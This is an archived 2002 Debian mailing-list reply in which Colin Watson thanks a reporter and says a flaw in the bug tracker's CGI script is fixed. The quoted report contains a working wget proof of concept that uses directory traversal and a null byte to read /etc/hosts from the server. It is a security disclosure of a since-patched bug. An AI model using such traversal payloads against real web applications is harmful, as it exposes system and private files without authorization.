Re: Debian website security issue

To: Max <rusmir@tula.net>
Cc: debian-www@lists.debian.org, listmaster@lists.debian.org, owner@bugs.debian.org
Subject: Re: Debian website security issue
From: Colin Watson <cjwatson@debian.org>
Date: Wed, 6 Nov 2002 18:14:39 +0000
Message-id: <[🔎] 20021106181439.GA2635@riva.ucam.org>
In-reply-to: <[🔎] Pine.LNX.4.44.0211060942400.7132-100000@sds.disney.com>
References: <[🔎] Pine.LNX.4.44.0211060942400.7132-100000@sds.disney.com>

On Wed, Nov 06, 2002 at 09:51:18AM -0800, Max wrote:
> Guys, your cgi scripts allow directory traversing and file disclosure.
> See for yourself:
> 
> wget -O - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=../../../../../../etc/hosts%00";

Thanks for the notice; this is now fixed.

Regards,

-- 
Colin Watson                                  [cjwatson@flatline.org.uk]

Reply to:

References:
- Debian website security issue
  - From: Max <rusmir@tula.net>

Prev by Date: Debian website security issue
Next by Date: Re: Doc/ pages not building properly (due to migration to gettext)
Previous by thread: Debian website security issue
Next by thread: www.debian.org/intl/l10n/po-debconf/ not up to date
Index(es):
- Date
- Thread